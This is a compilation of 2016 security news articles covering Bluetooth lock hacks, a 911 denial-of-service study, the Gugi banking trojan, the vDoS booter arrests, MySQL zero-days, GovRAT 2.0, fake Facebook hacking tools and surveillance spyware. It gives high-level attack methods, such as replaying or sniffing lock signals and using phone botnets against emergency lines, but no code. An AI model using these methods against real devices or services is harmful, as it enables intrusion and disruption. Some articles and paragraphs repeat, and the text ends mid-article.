Enter the Bluetooth lock, promising digital key convenience with temporary and Internet shareable access. The problem is, almost all of these locks have vulnerabilities, easily exploited via Bluetooth!
DEF CON always has the coolest new hacks and security news, and this year was no exception. The hacking conferences are a great way to get a pulse on the general status of the security world, what people are interested in, worried about, or looking to exploit.
This year clearly had an uptick in Internet of Things (IoT) devices and ways to hack them.
Obviously, we had to go and take a look at the Bluetooth lock hack, and we are not the only ones.
There were articles in a number of security and general tech sites about how vulnerable some of these locks are – a shocking 75% of them could be hacked relatively easily, and one reported to have great security could actually be broken into with a screwdriver.
The locks were from companies like BlueLock, Kwikset, Noke, August, BitLock, and QuickLock.
How to Hack a Bluetooth Lock:
How to Hack a Bluetooth Lock
There have been a number of different researchers who have tackled this problem, but Anthony Rose and Ben Ramsay out of Merculite Security did a great job of thoroughly going through a significant number of them, documenting the hacks and contacting the manufacturers.
Look for plaintext passwords: Many of the locks had passwords but were simply transmitting them in plaintext. Anyone with a decent Bluetooth sniffer like Ubertooth and some effort has just owned your password
Replay the signal: OK, great you’ve built in awesome encryption and I can't possibly hope to read and decrypt the signal you just sent to that lock. But I just capture and replay what you just sent, and the door opens wide.
Man in the Middle: Here I am, using one of the many Man in the Middle tools to sit in the middle of your connection and control everything you're transmitting to the device. There's *definitely* no way I could change what you’re transmitting (say, to keep the deadbolt from hearing a "lock" command).
The great news is that we found a video of Zero_Chaos and Granolocks at Pwnie Express that show all of this stuff in action and tools you can actually use to detect these hacks in action.
Locks are not the only Bluetooth devices shown to be vulnerable. Here’s a quick list of just some of the devices that have already been found vulnerable:
Teakettles and coffee machines
Medical devices (including implanted ones)
Fitness trackers
This news should be worrying for people who have invested in a cheap Bluetooth lock for their convenience, and such attacks could be a real problem just waiting to happen.

Here's How Hackers Can Disrupt '911' Emergency System and Put Your Life at Risk
13.9.2016 thehackernews Hacking
What would it take for hackers to significantly disrupt the US' 911 emergency call system?
It only takes 6,000 Smartphones.
Yes, you heard it right!
According to new research published last week, a malicious attacker can leverage a botnet of infected smartphone devices located throughout the country to knock the 911 service offline in an entire state, and possibly the whole United States, for days.
The attacker would only need 6,000 infected smartphones to launch automated Distributed Denial of Service (DDoS) attacks against 911 service in an entire state by placing simultaneous calls from the botnet devices to the emergency numbers.
However, as little as 200,000 infected mobile phones could knock the 911 emergency call system offline across the entire US.
Where does the Problem Lies?
Researchers from Ben-Gurion University of the Negev's Cyber-Security Research Center say the problem is in the fact that current US Federal Communications Commission (FCC) regulations demand all calls to 911 must immediately be routed to emergency services, regardless of the caller's identifiers.
In other words, mobile carriers re-route all 911 emergency calls to a local Public Safety Answering Point (PSAP) without even verifying the caller's identity or whether the caller is subscribers to the mobile network.
These identifiers could be a phone's International Mobile Subscriber Identity (IMSI) and International Mobile Station Equipment Identity (IMEI) codes, which tell whether the caller is a subscriber to their service and identity of the mobile equipment, respectively.
How can Attackers Carry Out such Attacks?
All an attacker need is a mobile botnet to launch TDoS (Telephony Denial of Service) attacks. The attack can be carried out in two ways:
By infecting smartphones with malware, or
By buying the smartphones needed to launch the TDoS attack.
The researchers Mordechai Guri, Yisroel Mirsky, and Yuval Elovici note in a paper [PDF] that an attacker could exploit cellular network protocols by placing a rootkit or persistent, low-level malware within the baseband firmware of a mobile phone.
The rootkit can then mask and randomize all cellular identifiers, causing the cell phone to have no genuine identification within the cellular networks.
"Such anonymised phones [bots] can issue repeated [911] emergency calls that can not be blocked by the network or the emergency call centers, technically or legally," the team notes in the paper.
Secondly, an attacker could simply buy 6,000 or 200,000 smartphones, which could cost $100,000 or $3.4 Million – a small sum for state-sponsored attackers – to jam 911 emergency system in an entire state or across the whole country respectively.
This TDoS attack should not come as a surprise, as during the 9/11 terror attack on the Twin Towers in New York City, thousands of legitimate callers collectively dialing 911 caused DDoS attacks on both telephony network as well as the emergency reporting system.
Of course, the team did not perform this attack in an actual, nationwide system. It created a small simulated cellular network based on North Carolina's 911 network and attacked it instead.
The team bot-infected Samsung Galaxy S3, S4 and S5 smartphones running Android 4.4 and 5.x operating system to test their work.
How can we prevent such DDoS campaign against our Emergency Services?
Such attacks are currently difficult to block, as PSAPs have no way to blacklist fake calls. Also, blocking at the network level is not possible beyond selectively turning off cellular service in bot-infested areas.
However, researchers suggest some countermeasures that can mitigate such attacks, which includes:
Storing IMEIs and other unique identifiers in a phone's trusted memory region (like ARM-processor design TrustZone), where malware can not alter them.
Implementing a mandatory "Call Firewall" on mobile devices to block DDoS activities like frequent 911 calls.
Since these changes would require government cooperation, security professionals, cellular service providers, emergency services, and others, it is hard to expect such significant changes in reality anytime soon.
For in-depth and detailed information about the attack and possible mitigation procedures for US authorities, you can head on to the research paper [PDF] titled, '9-1-1 DDoS: Threat, Analysis and Mitigation.'

Gugi: from an SMS Trojan to a Mobile-Banking Trojan
13.9.2016 Kaspersky  Virus
In the previous article, we described the mechanisms used by Trojan-Banker.AndroidOS.Gugi.c to bypass a number of new Android 6 security features. In this article, we review the entire Gugi mobile-banking Trojan family in more detail.

The use of WebSocket by Gugi

The mobile-banking Trojan family, Trojan-Banker.AndroidOS.Gugi is interesting due to its use of the WebSocket protocol to interact with its command-and-control servers. This protocol combines the advantages of HTTP with those of commonly used sockets: there is no need to open extra ports on a device, as all the communication goes through standard port 80. At the same time, real-time data exchange is possible.

It is worth noting that even though this technology is user-friendly, it is not that popular among attackers. Among all the mobile Trojans that utilize WebSocket technology, more than 90% are related to the Gugi family.

WebSocket Usage in Mobile SMS Trojans

We registered the first case of WebSocket technology use in mobile Trojans at the end of December 2013. It was Trojan-SMS.AndroidOS.FakeInst.fn. Judging by the code, the Trojan was created by the same malefactors who created the Trojan-Banker.AndroidOS.Gugi family.

During the initial registration, the FakeInst.fn Trojan uploads a large amount of device-related data to its server. The data includes the telephone number, the carrier information, IMEI, IMSI, etc.

From the server, the malware may receive a JSON file with the following commands (and data for the commands):

SMS – send a text message with specified text to a specified number;
intercept – enable or disable the interception of incoming SMS messages;
adres – change a command-and-control server address;
port – change a command-and-control server port;
contacts – send a bulk SMS message with specified content to all the contact numbers listed on the infected device.
In addition, the Trojan steals all outgoing SMS messages.

In the middle of January 2014, just a couple of weeks after discovering FakeInst.fn, a new version of the Trojan appeared. The malware was no longer using WebSocket; instead the communication was performed with the help of the HTTP protocol (GET and POST requests). Among all the installation packages of the Trojan, we could discover only two (dating back to the middle of March 2014) that utilized WebSocket. Everything seemed to indicate that the attackers decided to drop the technology for a while. They started to use it again almost two years later, in the Gugi family.

From SMS Trojans to Mobile Banking Trojans

Two years after finding the first version of Trojan-SMS.AndroidOS.FakeInst.fn, which utilized WebSocket, a new Websocket-using Trojan appeared, Trojan-Banker.AndroidOS.Gugi.a.

There are multiple matches in the Gugi code (variable and method names) with the Trojan-SMS.AndroidOS.FakeInst.fn code. The major changes within Gugi were the addition of a phishing window to steal the device user’s credit-card data and the use of WebSocket. Within all the Gugi mobile-banking Trojan family installation packages detected by us, WebSocket technology is used to communicate with the command-and-control server. Thus, the attackers had switched from Trojan-SMS to Trojan-Banker.

Evolution of the Trojan-Banker.AndroidOS.Gugi

The evolution of the Gugi Trojan can be split into two stages:


The first stage started in the middle of December 2015. The word “Fanta” is used within the name of all versions of the Trojan related to this stage, for example, “Fanta v.1.0”.

On request from the command-and-control server, Gugi Trojan version 1.0 could perform the following actions:

stop its operation;
steal all the contacts from the device;
steal all the SMS messages from the device;
send an SMS message with specified text to a specified number;
send a USSD request;
steal SMS messages from a specified group/conversation.
In late December 2015, we spotted the next version of Gugi, “Fanta v.1.1”. Its major difference from the previous version was that the code had a way of disabling the phishing window (we would like to remind you that Gugi can also be used as an SMS Trojan). Another new feature allowed contacts to be added to the infected device at the request of the server. This version was spread much more actively than the first one.

At the beginning of February 2016, we detected two new versions of Gugi, “Fanta v2.0” and “Fanta v2.1”. These versions had an increased focus on banking. First, they came with a new phishing window for stealing the username and password from the mobile banking software of one of the largest Russian banks. Secondly, the Trojan code introduced the list of phone numbers of two Russian banks. All incoming SMS messages from these numbers were not only sent to the malefactors’ server (like other SMS messages) but were hidden from the user.

These versions had a phishing window, shown either on request from the server or right after the smartphone had booted up. The window would not close until the user had entered their data.

Then, in the middle of March 2016, we found “Fanta v.2.2”. This became the most popular version of al, accounting for more than 50% of all of the installation packages related to the “Fanta” stage. Starting from this version, phishing windows were drawn over banking applications and Google Play.

Gugi: from an SMS Trojan to a Mobile-Banking Trojan

Phishing window over Google Play Store

One more phishing window started to appear, right before the window for stealing credit-card data. This window read: “Link your credit card to Google Play Store and get 200 rubles for any apps!”

Additionally, starting from this version, the Trojan actively fights its removal. If the malware has Device Administrator rights, then its removal is possible only after disabling those rights. Therefore, whenever the Trojan does not have Device Administrator rights, it aggressively demands such permission, drawing its window over the device settings window.

In April 2016, we found the most recent “Fanta” version to date, “Fanta v.2.3”. That version had only one significant change: if the user disables the Device Administrator rights for the Trojan, then the malware changes the device password, effectively blocking the device.

All versions of “Fanta” are detected by the Kaspersky Lab products as Trojan-Banker.AndroidOS.Gugi.a.


The first file related to the second stage, “Lime”, was found a week before “Fanta v2.3” appeared, at the beginning of April 2016.

The installation package code for “Lime” seems to have been rewritten from the Fanta stage. The code, as well as the version names, had the word “Fanta” excluded and replaced with “Lime” in some lines. The same Trojan name, “Lime”, is seen in the administration panel through which the malefactors control this malware.

Gugi: from an SMS Trojan to a Mobile-Banking Trojan

Trojan’s administration panel

Versions of the Trojan relating to the “Lime” stage do not change the device password when Device Administrator rights are disabled.

The first file discovered by us in April 2016 was version 1.1 and, judging by the code, was a test file. The next installation package related to the “Lime” stage was discovered in the middle of May 2016. It had the same version number, 1.1, but improved functionality.

The major change in version 1.1 of the “Lime” stage was that it showed new phishing windows. At that time, the Trojan could attack five banking apps of various Russian banks. Additionally, it had a new command to get the list of rules for processing incoming SMS messages. These rules define which messages should be hidden from the user and which messages should be replied to with specific messages.

Further, during the course of May 2016, we discovered files labelled 1.2 and 1.5 by the authors, even though the features of the files had not been changed.

Meanwhile, a new version of the Android OS, version 6.0, was released with security features that did not let the Trojan function properly. In June, we found a new version of the Trojan, 2.0, in which the malefactors had added support for Android 6. On Android 6 devices, the Trojan first requests permission to draw over other apps. Then, using the permission to its own advantage, it practically blocks the device, forcing the user to give Device Administrator rights to the malicious application as well as permission to read and send SMS messages and make calls.

Versions 3.0 and 3.1, which were found in July, have the same features as version 2.0 and utilize the same command-and-control server but different ports. Only one installation package for each version has been found by us. At the same time, version 2.0 continues to be actively spread.

All of the “Lime”-stage versions are detected by Kaspersky Lab products as Trojan-Banker.AndroidOS.Gugi.b and Trojan-Banker.AndroidOS.Gugi.c.


The Trojan is actively transmitted via SMS spam, with a link to phishing web pages that show a message indicating that the user has, supposedly, received an MMS picture.

Gugi: from an SMS Trojan to a Mobile-Banking Trojan

Information about MMS message on phishing website

If the “show” button in the message is clicked, then the Trojan-Banker.AndroidOS.Gugi will be downloaded onto the device. It is highly likely that the name of the Trojan downloaded from such a websi фte will be similar to img09127639.jpg.apk.

As we have written in a previous post, we have encountered an explosive growth of Trojan-Banker.AndroidOS.Gugi attacks. August revealed 3 times as many users attacked by Gugi as in July, and almost 20 times as many as in June.

Gugi: from an SMS Trojan to a Mobile-Banking Trojan

An amount of Kaspersky Lab mobile product users attacked by Trojan-Banker.AndroidOS.Gugi mobile-banking Trojan family

Today, the biggest number of attacks is performed by Lime version 2.0. All of the known active command-and-control servers of this Trojan are related to Lime versions 1.5 – 3.1. Not a single “Fanta” server known to us has been accessible since the middle of August 2016.

More than 93% of attacked users were located in Russia.

2 Israeli teens arrested for allegedly running the vDoS booter
13.9.2016 securityaffairs Hacking

The Israeli law enforcement arrested two youngsters suspected of operating the infamous vDoS booter.
Israeli authorities have arrested two alleged operators of a DDoS service, named vDOS, as the result of an investigation conducted by the FBI.

The popular security investigator Brian Krebs reported that the duo behind the vDOS booter service had earned more than $600,000 in the past two years. It has been estimated that the service was used to launch 150,000 DDoS attacks, its customers can rent it for a price that ranges between $20 and $200 per month. According to the experts, the vDOS booter has been active around since 2012.

“vDOS — a “booter” service that has earned in excess of $600,000 over the past two years helping customers coordinate more than 150,000 so-called distributed denial-of-service (DDoS) attacks designed to knock Web sites offline — has been massively hacked, spilling secrets about tens of thousands of paying customers and their targets.” wrote Krebs in its analysis.

The security expert investigated the vDOS booter after he obtained its database in July 2016. The database was leaked after the booter service was hacked. Data included in the archive points to two young men in Israel as the masterminds of the service. He discovered that other young hackers, mostly from the US attack service, were involved as support services.

Krebs analyzed configuration files and real IP addresses that suggested the involvement of two Israeli nationals, Itay Huri and Yarden Bidani, who used the aliases P1st and AppleJ4ck. The Krebs’ website was hit by a DDoS attack that peaked at nearly 140 Gbps, just after the popular expert disclosed his findings on the suspects.

While Krebs was disclosing the findings of his analysis, Israeli media reported the arrest of the young men under indication of the FBI.

The Israeli law enforcement arrested the two alleged owners of vDoS and placed them under house arrest for 10 days banning them using the Internet and any telecom equipment for 30 days.

The duo recently published a technical paper on DDoS attacks on the website of Israeli company Digital Whisper, the Twitter account he was using reports vDoS as his personal website.


The vDOS website (vdos-s.com) is now offline. ù

New MySQL Zero Days — Hacking Website Databases
13.9.2016 securityaffairs Vulnerebility
Two critical zero-day vulnerabilities have been discovered in the world's 2nd most popular database management software MySQL that could allow an attacker to take full control over the database.
Polish security researcher Dawid Golunski has discovered two zero-days, CVE-2016-6662 and CVE-2016-6663, that affect all currently supported MySQL versions as well as its forked such as MariaDB and PerconaDB.
Golunski further went on to publish details and a proof-of-concept exploit code for CVE-2016-6662 after informing Oracle of both issues, along with vendors of MariaDB and PerconaDB.
Both MariaDB and PerconaDB had fixed the vulnerabilities, but Oracle had not.
The vulnerability (CVE-2016-6662) can be exploited by hackers to inject malicious settings into MySQL configuration files or create their own malicious ones.
Exploitation Vector
The above flaw could be exploited either via SQL Injection or by hackers with authenticated access to MySQL database (via a network connection or web interfaces like phpMyAdmin).
"A successful exploitation [of CVE-2016-6662] could allow attackers to execute arbitrary code with root privileges which would then allow them to fully compromise the server on which an affected version of MySQL is running," Golunski explained in an advisory published today.
This could result in complete compromise of the server running the affected MySQL version.
The researcher also warned that the vulnerability could be exploited even if SELinux or AppArmor Linux kernel security module is enabled with default active policies for MySQL service on the major Linux distributions.
The flaw actually resides in the mysqld_safe script that is used as a wrapper by many MySQL default packages or installations to start the MySQL service process.
The mysqld_safe wrapper script is executed as root, and the primary mysqld process drops its privilege level to MySQL user, Golunski examined.
"If an attacker managed to inject a path to their malicious library within the config, they would be able to preload an arbitrary library and thus execute arbitrary code with root privileges when MySQL service is restarted (manually, via a system update, package update, system reboot, etc.)"
The researcher will soon release details and full exploit code for CVE-2016-6663, the flaw that allows low-privileged attackers to make exploitation trivial.
No MySQL Patch Available Yet
Golunski reported the zero-day flaws to Oracle on July 29 and other affected vendors on July 29.
While Oracle acknowledged and triaged the report, scheduling the next Oracle CPUs for October 18, 2016, MariaDB and PerconaDB patched their versions of the database software before the end of August.
Since more than 40 days have passed and the two vendors released the patches to fix the issues, Golunski said he decided to go public with the details of the zero-days.
Temporary Mitigation:
Until Oracle fixes the problem in its next CPU, you can implement some temporary mitigations, proposed by the researcher, for protecting your servers.
"As temporary mitigations, users should ensure that no MySQL config files are owned by the mysql user, and create root-owned dummy my.cnf files that are not in use," Golunski wrote.
But remember, the above mitigations are just workarounds, so you are advised to apply vendor patches as soon as they become available.

GovRAT 2.0 continues to target US companies and Government
13.9.2016 securityaffairs Virus

Vxers developed a new version of GovRAT, called GovRAT, that has been used to target government and many other organizations in the US.
GovRAT is an old cyberespionage tool, it has been in the wild since 2014 and it was used by various threat actors across the years.

Security experts from the threat intelligence company InfoArmor first spotted the malware in 2015.

GovRAT a hacking platform that allows the malware creation, it comes bundled with digital certificates for code signing. The same digital certificates were initially offered for sale on the black marketplace TheRealDeal Market hosted on the Tor network. In 2015, GovRAT was offered for sale at 1.25 Bitcoin, but experts observed the creator also offering it is private sales.

GovRAT Digital certificates

The GovRAT tool digitally signs malicious code with code-signing tools such as Microsoft SignTool, WinTrust, and Authenticode technology. The experts consider that final customer for GovRAT are APT groups targeting political, diplomatic and military employees of more than 15 governments worldwide.

The author of the GovRAT who goes online with the moniker “bestbuy” had been offering the its source code, including a code-signing digital certificate, for nearly 4.5 Bitcoin on the TheRealDeal black market.

The availability of source code in the wild allows anyone to modify the source code and improve it, and it is what is happening with the GovRAT 2.0.

Vxers recently released a new version of the RAT, so-called GovRAT 2.0 that has been used by hackers to target the US Government and other organizations in the country.


After the first report published by InfoArmor, Bestbuy started using also the moniker “Popopret.”

The RAT was delivery through spear-phishing and drive-by downloads attacks. Among the victims government and military organizations. Stolen data from military organizations were also offered for sale on the black market.

The new strain of GovRAT 2.0 includes several new features, including improved detection evasion methods, remote command execution, automatically mapping hard disks and network shares.

According to experts from InfoArmor, government and military agencies have been increasingly targeted by threat actors leveraging the threat.

Below the complete list of features introduced in the GovRAT 2.0 reported in the report “GOVRAT V2.0 ATTACKING US MILITARY AND GOVERNMENT” published by InfoArmor.

Access C&C with any browser.
Compile C&C for Linux OR Windows.
Cannot be reversed without the private key. 0day anti-debugging.
Automatically maps all hard disks and network disks.
Creates a map of files to browse even when the target is offline.
Remote shell/command execution.
Upload files or Upload and Execute files to target.
Download files from target. All files are compressed with LZMA for faster downloads and encrypted on transport.
Customized encryption for communications. No two machines will use the same key (ever).
SSL Support for communication. (you have to get your own *Valid* SSL certificate to use this).
Does not use SOCKS libraries. Uses special Windows APIs to communicate and cannot be blocked.
C&C creates a one-time password every time the user logs in for extra security.
Comes with source for FUD keylogger that sends keys to another server.
Excellent for long term campaigns where a stable connection is needed.
Another interesting feature implemented by the malware is its ability to spread via USB devices and network shares like a worm.

The prices range from $1,000 for basic binary and the code for the command and control, up to $6,000 for a complete package that includes the source code of every component of the malicious infrastructure and the extra modules.

Security experts have discovered several offers for credentials for many U.S. government domains, including gsa.gov, va.gov, nasa.gov, nps.gov, faa.gov and state.gov, and domains related to the U.S. military, such as navy.mil, mail.mil, army.mil and af.mil.

“On one of the underground communities in the TOR network, the same bad actor is selling compromised credentials relating to FTP servers of various US Government entities” reads the report. “In addition to NOAA.gov, USPS.gov and CDG.gov, the bad actor is selling several credentials for subdomains at JPL.NASA.gov and NAVY.mil:”

The credentials have also been used multiple GovRAT 2.0 attacks, experts also observed the use of other 33,000 credentials stolen from US government, research and educational organizations provided by the malware creator by the hacker known as “PoM,” aka Peace_of_Mind or Peace.

“There is another bad actor identified as “PoM,” who is a partner of popopret, and is selling 33,000 records with credentials related to the US Government and various research and educational organizations.” reads the report. “In the post description, he outlines that the data was hashed but he was able to decrypt it and can potentially use it for “accessing other agencies,” as well as for use in SE (social engineering) and spear phishing campaigns. PoM provides the stolen data of government and military employees to other actors using GovRAT v2.0 for highly targeted malware delivery. After a thorough analysis, it was determined that most of this data was accessed from the hacked National Institute of Building Sciences (http://www.nibs.org/) website. It contains numerous members from the research, educational, government and military community. “

For more details on GovRAT 2.0, give a look at the report published by InfoArmor.

Hacking wannabe hackers: watch out Facebook Hacker Tools!
13.9.2016 securityaffairs Hacking

Everyone is a potential victim, even the wannabe hackers that try to exploit Facebook Hacker Tools to hack into friends’ accounts.
When dealing with cybercrime everyone, is a potential victim, even the hackers, this is the case of a Crimeware-as-a-Service hack that turns wannabe crooks into victims.
For those who are looking to hack the Facebook accounts of others, there is a marketplace of Facebook Hacker tools that promise to allow it without specific knowledge.
Crooks are using Google Drive to host a new Facebook Hacker Tools that allows attackers to steal credentials from potential hackers who try to hack other users’ accounts on the Facebook social network.

Experts from the firm Blue Coat Elastica Cloud Threat Labs (BCECTL), now owned by Symantec, have discovered several versions of the Facebook Hacker Tools, including Faceoff Facebook Hacker, Skull Facebook Hacker and Scorpion Facebook Hacker.
“When they deploy this CaaS service, it becomes very easy for users to conduct cyberattacks,” said BCECTL director Aditya Sood.

The way the Facebook Hacker Tools work is very simple, typically they will ask the wannabe hacker that uses the tool to provide the Facebook profile ID of his victim. Then it displays some fake error messages and asks the user to provide an activation code to hack into the profile.

Experts at BCECTL discovered similar attacks by analyzing the files hosted on Google Drive. Links to several Facebook Hacker tools were being actively distributed and shared on Google Drive.
“It’s hard to list the numbers, but we have discovered multiple instances [seven-plus] on Google Drive at the moment,” Sood said. “We haven’t checked on other cloud services or standard domains.” added Sood.

Hackers abuse the web publishing functionality included in cloud services like Google Drive. One of the tools used by the crooks allows an attacker to send to the wannabe hacker a Google Drive link that takes them to a “Facebook Friend’s Account Hacker” document. Of course, the wannabe hacker that intends to hack his friend’s account needs to provide his Facebook login credentials.

Facebook Hacker Tools

Once the wannabe hacker has provided his credentials they are sent back to the operator behind the scam.

Stolen credentials could be offered for sale in the underground market or used for a wide range of illegal activities.

Such kind of attacks is particularly insidious for enterprise, the credentials of their employees could be exposed allowing attackers to access company resources. Attackers can target business users stealing their credentials and launch more sophisticated attacks in the future.

Let’s think for example of the possibility to steal login credentials of an employee that works as system administrators or that manage sensitive financial data of the company.

A growing number of companies are passing to cloud services, for this reason, it is essential to carefully evaluate the risks of exposure to such kind of attack linked to the use of social media.

“We are living in a world where these social networks have become part and parcel of our lives,” Sood explained. “Cybercriminals can abuse this information and other tools, and sell that access to users.”

In order to prevent such kind of attacks, it is essential to adopt a proper security posture promoting awareness inside the companies.

It is important to educate employees in a correct and safe use of social media even in the workspace.

Another important aspect to consider is the incident response, one such kind of attacks against an employee is discovered.

The adoption of cloud security solution could also help to mitigate the risk of attacks.

PCI PIN Transaction Security requests upgradeable credit card readers

13.9.2016 securityaffairs Security

The Payment Card Industry Security Standards Council (PCI Council) updates its standard to reduce fraudulent activities against PoS systems.
The number of credit card frauds involving Point-of-Sale continues to increase, in the last months, numerous attacks targeted retails and hotels worldwide.

The Payment Card Industry Security Standards Council (PCI Council) has responded with the definition of a new standard to reduce fraudulent phenomena, the organization plan to improve the security of PoS systems by making them upgradeable in an easy way.

Last week, the PCI council issued the version 5.0 of the PCI PIN Transaction Security (PTS) Point-of-Interaction (POI) Modular Security Requirements.


A close look at the standard allowed the experts to notice the new requirements for the payment industry, in particular:

The adoption of a new control that allows the upgrade of the firmware running on PoS readers. “The device must support firmware updates. The device must cryptographically authenticate the firmware and if the authenticity is not confirmed, the firmware update is rejected and deleted”
Core Physical Security Requirements also include Tamper-proofing items so that the device can become inoperable in response to an attack. “The device uses tamper-detection and response mechanisms that cause it to become immediately inoperable and result in the automatic and immediate erasure of any sensitive data that may be stored in the device, such that it becomes infeasible to recover the sensitive data. These mechanisms protect against physical penetration of the device by means of (but not limited to) drills, lasers, chemical solvents, opening covers, splitting the casing (seams), and using ventilation openings.”;
The devices have to be immune to side-channel attacks (i.e. monitoring of electromagnetic emanations) that could result to leaking keys;
The device must execute self-test upon start-up to verify anomalies that could bring it in a compromised state. “The device performs a self-test, which includes integrity and authenticity tests upon start-up and at least once per day to check whether the device is in a compromised state. In the event of a failure, the device and its functionality fail in a secure manner. The device must reinitialize memory at least every 24 hours.”
The new standard aims to contrast the intensification of card skimming attacks and intends to improve the security of the payment industry.

Banks are observing a similar trend, the popular investigator Brian Krebs recently published an interesting post that warns about an alarming increase of skimming attacks for both American and European banks.

“Skimming attacks on ATMs increased at an alarming rate last year for both American and European banks and their customers, according to recent stats collected by fraud trackers.” wrote Krebs. “The trend appears to be continuing into 2016, with outbreaks of skimming activity visiting a much broader swath of the United States than in years past.”

The FICO Card Alert Service issued several warnings about a spike in ATM skimming attacks.

On April 8, FICO noted that its fraud-tracking service recorded a 546 percent increase in ATM skimming attacks from 2014 to 2015.

PoS devices that are hard to upgrade represent a serious problem for the payment industry. Upgradeable card-reading kit are expensive and the lack of proper security posture retards the adoption of necessary countermeasures. Making card readers upgradeable should mean a significant improvement of the point of sale security.

The banking industry continues to be under attack, recently chip-and-PIN technology started to be adopted in the US because it would improve the security of the customers, merchants, and financial institutions.

The new standard will be effective from September 2017 and will replace the current version 4.1.

Motherboard shows us how surveillance software works
13.9.2016 securityaffairs BigBrothers

Surveillance is a profitable business, Motherboard has published a never-before-seen 10-minute video showing a live demo of a surveillance software.
Recently, the iPhone hack carried out with the NSO Group‘s Pegasus raised the debate about the use of surveillance software. Who uses them? How? Are we able to defend our machines from a so invasive surveillance?

NSO Group is just one company in a profitable market, to give you an idea of it I invite you to give a look to the Transparency Toolkit, a project that gathers open data on surveillance and human rights abuses and makes free software to examine them. The official page of the project includes tools and case studies.

Hacking Team, Gamma International, NSO Group, Blue Coat, and Verint are only the first names of surveillance firms that passed in my mind while I’m writing this post, but the list is very long.

These firms design solutions that are used by law enforcement and intelligence agencies during their investigations. The expensive solutions proposed by the surveillance firms allows to spy on computers and smartphones, unfortunately, their abuses in the wild are very common. Many governments used them in the past to track dissidents and oppositions, in many cases the use of surveillance solutions represented a severe violation of human rights.

Despite we can read thousands of good posts on the topic, it isn’t so easy to see a live demo of surveillance systems, but the popular journalist Lorenzo Bicchierai has published an interesting post on Motherboard with the intent to show us how government spyware infects a computer.

“Motherboard has obtained a never-before-seen 10-minute video showing a live demo for a spyware solution made by a little known Italian surveillance contractor called RCS Lab. Unlike Hacking Team, RCS Lab has been able to fly under the radar for years, and very little is known about its products, or its customers.” wrote Bicchierai.

Motherboard published a video related to a live demo presented by an expert from the Italian surveillance firm RCS Lab. The video shows how the company’s spyware Mito3 could be used to spy on an unaware suspect.

“Mito3 allows customers to listen in on the target, intercept voice calls, text messages, video calls, social media activities, and chats, apparently both on computer and mobile platforms. It also allows police to track the target and geo-locate it thanks to the GPS. It even offers automatic transcription of the recordings” reads a confidential brochure obtained by Motherboard.

RCS Lab’s spyware Mito3 allows attackers to launch MiTM attacks against the victims injecting malicious content in the connection to any website he intends to visit. The software is very easy to use as explained in the post.

“An agent can choose whatever site he or she wants to use as a vector, click on a dropdown menu and select “inject HTML” to force the malicious popup to appear, according to the video.”reported MotherBoard.”

“Mito3 allows customers to listen in on the target, intercept voice calls, text messages, video calls, social media activities, and chats, apparently both on computer and mobile platforms. It also allows police to track the target and geo-locate it thanks to the GPS. It even offers automatic transcription of the recordings” reads a confidential brochure obtained by Motherboard.

RCS Lab’s spyware Mito3 allows attackers to launch MiTM attacks against the victims injecting malicious content in the connection to any website he intends to visit. The software is very easy to use as explained int he post.

“An agent can choose whatever site he or she wants to use as a vector, click on a dropdown menu and select “inject HTML” to force the malicious popup to appear, according to the video.”reported MotherBoard.”

surveillance software live-demo

In the video the RCS employee chooses the mirc.com website (IRC chat client) as attack vector then inject with malware in order to compromise the target machine. When the victim visits the mirc.com website, it displays a fake Adobe Flash update installer pops up that is created by the surveillance software by injecting the malicious code. The user is urged to click install in order to proceed the navigation on the website, allowing the surveillance spyware to infect his machine.

I wish to thank Motherboard and Lorenzo Bicchierai for their post that gives us more information on surveillance practices.

Hacking wannabe hackers: watch out Facebook Hacker Tools!

12.9.2016 securityaffairs Social

Everyone is a potential victim, even the wannabe hackers that try to exploit Facebook Hacker Tools to hack into friends’ accounts.
When dealing with cybercrime everyone, is a potential victim, even the hackers, this is the case of a Crimeware-as-a-Service hack that turns wannabe crooks into victims.
For those who are looking to hack the Facebook accounts of others, there is a marketplace of Facebook Hacker tools that promise to allow it without specific knowledge.
Crooks are using Google Drive to host a new Facebook Hacker Tools that allows attackers to steal credentials from potential hackers who try to hack other users’ accounts on the Facebook social network.

Experts from the firm Blue Coat Elastica Cloud Threat Labs (BCECTL), now owned by Symantec, have discovered several versions of the Facebook Hacker Tools, including Faceoff Facebook Hacker, Skull Facebook Hacker and Scorpion Facebook Hacker.
“When they deploy this CaaS service, it becomes very easy for users to conduct cyberattacks,” said BCECTL director Aditya Sood.

The way the Facebook Hacker Tools work is very simple, typically they will ask the wannabe hacker that uses the tool to provide the Facebook profile ID of his victim. Then it displays some fake error messages and asks the user to provide an activation code to hack into the profile.

Experts at BCECTL discovered similar attacks by analyzing the files hosted on Google Drive. Links to several Facebook Hacker tools were being actively distributed and shared on Google Drive.
“It’s hard to list the numbers, but we have discovered multiple instances [seven-plus] on Google Drive at the moment,” Sood said. “We haven’t checked on other cloud services or standard domains.” added Sood.

Hackers abuse the web publishing functionality included in cloud services like Google Drive. One of the tools used by the crooks allows an attacker to send to the wannabe hacker a Google Drive link that takes them to a “Facebook Friend’s Account Hacker” document. Of course, the wannabe hacker that intends to hack his friend’s account needs to provide his Facebook login credentials.

Facebook Hacker Tools

Once the wannabe hacker has provided his credentials they are sent back to the operator behind the scam.

Stolen credentials could be offered for sale in the underground market or used for a wide range of illegal activities.

Such kind of attacks is particularly insidious for enterprise, the credentials of their employees could be exposed allowing attackers to access company resources. Attackers can target business users stealing their credentials and launch more sophisticated attacks in the future.

Let’s think for example of the possibility to steal login credentials of an employee that works as system administrators or that manage sensitive financial data of the company.

A growing number of companies are passing to cloud services, for this reason, it is essential to carefully evaluate the risks of exposure to such kind of attack linked to the use of social media.

“We are living in a world where these social networks have become part and parcel of our lives,” Sood explained. “Cybercriminals can abuse this information and other tools, and sell that access to users.”

In order to prevent such kind of attacks, it is essential to adopt a proper security posture promoting awareness inside the companies.

It is important to educate employees in a correct and safe use of social media even in the workspace.

Another important aspect to consider is the incident response, one such kind of attacks against an employee is discovered.

The adoption of cloud security solution could also help to mitigate the risk of attacks.

Mal/Miner-C mining malware leverages NAS devices to spread itself
12.9.2016 securityaffairs Virus

Experts from Sophos discovered Mal/Miner-C, a malware designed to abuse resources of the infected machine to mine Monero (XMR) cryptocurrency.
Malware researchers from security firm Sophos have analyzed a new strain of malware detected as Mal/Miner-C that was designed to abuse resources of the infected machine to mine Monero (XMR) cryptocurrency.

The experts discovered that the new malware leverages network-attached storage (NAS) devices as attack vector.

The authors of Mal/Miner-C sued the NSIS (Nullsoft Scriptable Install System) scripting language to develop it.

